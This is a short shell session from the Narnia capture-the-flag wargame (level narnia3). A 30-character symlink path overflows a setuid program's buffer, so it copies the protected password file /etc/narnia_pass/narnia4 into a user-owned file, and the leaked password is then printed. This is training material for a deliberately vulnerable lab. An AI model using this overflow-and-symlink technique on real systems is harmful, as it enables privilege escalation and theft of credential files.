narnia3@gibson:/tmp/1$ ./narnia3 /tmp/1/123456789012345678901234567890
copied contents of /tmp/1/123456789012345678901234567890 to a safer place...
(67890)
narnia3@gibson:/tmp/1$ ls -la
total 16144
drwxrwxr-x    2 narnia3 narnia3     4096 Apr 16 14:13 .
drwxrwx-wt 2051 root    root    16515072 Apr 16 14:13 ..
lrwxrwxrwx    1 narnia3 narnia3       24 Apr 16 14:13
123456789012345678901234567890 -> /etc/narnia_pass/narnia4
-rw-rw-r--    1 narnia3 narnia3       31 Apr 16 14:13 67890
lrwxrwxrwx    1 narnia3 narnia3       15 Apr 16 14:08 narnia3 ->
/narnia/narnia3
narnia3@gibson:/tmp/1$ cat 67890
aKNxxrpDc1


